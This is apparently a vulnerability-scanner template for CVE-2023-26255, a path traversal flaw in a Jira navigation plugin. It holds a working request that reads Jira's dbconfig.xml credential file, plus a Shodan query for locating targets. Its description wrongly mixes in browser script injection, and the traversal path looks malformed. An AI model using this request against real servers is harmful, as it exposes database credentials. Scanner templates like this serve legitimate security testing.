47 lines
1.6 KiB
YAML
47 lines
1.6 KiB
YAML
id: CVE-2023-26255
|
|
|
|
info:
|
|
name: STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
STAGIL Navigation for Jira Menu & Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
reference:
|
|
- https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26255.md
|
|
- https://marketplace.atlassian.com/apps/1216090/stagil-navigation-for-jira-menus-themes?tab=overview&hosting=cloud
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-26255
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-26255
|
|
cwe-id: CWE-22
|
|
cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:*:*:*
|
|
epss-score: 0.21906
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: title:Jira
|
|
tags: cve,cve2023,lfi,jira,cms,atlassian
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<jira-database-config>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- '$textMime'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by md on 2023/03/22
|